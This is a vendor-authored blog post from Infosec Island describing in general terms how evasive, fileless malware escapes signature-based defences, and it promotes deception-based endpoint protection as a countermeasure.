Evasive Malware on the Rise: Time to Stop Stealth Attacks in their Tracks

Imagine discovering that the locks and alarms on the doors and windows of your home only worked sometimes, in unpredictable fashion. How would you keep thieves away from your valuables and protect your family members? Would you camp out in the front room keeping watch night after night? You’d have to find a way to outwit would-be intruders. Wouldn’t it be nice if you could trick them with an illusion that made your house look completely empty or full of hungry Rottweilers?

This made-up scenario is all too real in cyberspace. Information security solutions dependent on previously identified signatures, behaviors, or patterns simply do not stop every attack. As hackers increasingly employ stealthy evasive malware and ransomware techniques, organizations are recognizing they need an efficient and reliable way to beat the creepers at their own game. Businesses that don’t address evasive malware and ransomware head-on are in for a rude awakening. Cisco’s Midyear Cybersecurity Report confirms that malware developers are evolving and shifting their techniques with increasing skill and speed, even commoditizing their guerrilla weapons into ransomware-as-a-service platforms.

In a recent rash of attacks (150 organizations in 40 countries), fileless malware was used to access bank networks and install additional malware on ATMs that cause them to dispense cash at the touch of a button. It’s important to understand how these evasive exploits work. Malware authors aim to breach endpoints on their way to more extensive infiltration of systems and networks, often scraping credentials, installing spyware, or establishing the ability to remotely execute commands. In order to carry out such schemes, malware is designed to stay undetected for as long as possible. Malware is built to employ various ways of bypassing existing defenses, including checking the endpoint environment for AV, firewalls, gateways, debuggers, and sandboxes before launching exploit mechanisms.

The most devious malware authors go out of their way to package their malware so that it can’t be fingerprinted: they know that once pinpointed, the unique identifiers will be incorporated into AV updates. These fileless attacks leverage known vulnerabilities (browsers, Java, Flash, etc.) and phishing campaigns to gain entry, run code in the target computer’s memory, and continue to infiltrate by launching script interpreters like PowerShell. Malware that manipulates existing Windows programs in this way are able to trick AV, as it is difficult to distinguish between legitimate macros and malicious document files. Similarly, if malware unpacks its code into a non-malicious process, AV has a hard time preventing the resulting attack. Sophisticated attackers are even using open-source penetration testing tools to inject code into (or scrape data from) system memory.

Fileless, evasive malware is shaping up to be the exploit of the future, at least until something more potent and insidious comes along. Businesses must move quickly to supplement their endpoint protection solutions that depend on previously identified patterns and signatures. Patching and updating remain essential, but realistically, these practices are chronically neglected and incomplete. Disabling macros, limiting access privileges, whitelisting applications, segmenting networks and blocking unnecessary protocols will eliminate many of the entry points and hiding places malware authors rely on, but only until they learn new tricks. Often, these measures are not practical or have an unacceptable impact on productivity. Training employees to detect phishing scams and setting email filters to thwart BEC (business email compromise) attacks is important, but not sufficiently reliable or comprehensive. Monitoring device and Windows logs is a good way to detect unauthorized services and processes, but most organizations are already struggling to keep up with alerts and incident reviews.

While the technology does not yet exist to fool thieves into thinking you have an empty house or a pack of vicious guard dogs, businesses seeking to outmaneuver stealthy malware do have some tricks at their disposal. Prevention-oriented solutions use the attackers’ evasive strengths against them, by purposefully deceiving the malware as it tests its target environment. By simulating a forensic environment that the malware identifies as inaccessible or not exploitable, these methods trigger the malware to disarm before it unpacks or does any damage. These simulation methods deceive the malware regarding its ability to interact with other processes, thereby preventing its access to memory and sensitive data. This approach is effective against a variety of memory injection techniques, which is essential to defending against the spread of fileless malware.

Creating this “virtual reality” on endpoints enables malware vaccination, contains threats designed to bypass existing security solutions, and works even on previously unseen and rapidly shape-shifting mechanisms. As the cyber wars escalate, it is painfully clear that fighting exploits tit-for-tat is an unsustainable battle plan. Cyber crime is too organized, advanced, and profitable — and the digital systems modern commerce and society rely on are too vast and interwoven. We need to develop and implement creative solutions that are broadly effective at turning “easy target” endpoints into dead ends for hackers and their tricks.

About the author: Eddy Boritsky is the CEO and Co-Founder of Minerva, an endpoint security solution provider. He is a cyber and information security domain expert. Before founding Minerva, Eddy was a senior cyber security consultant for the defense and financial sectors.

The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.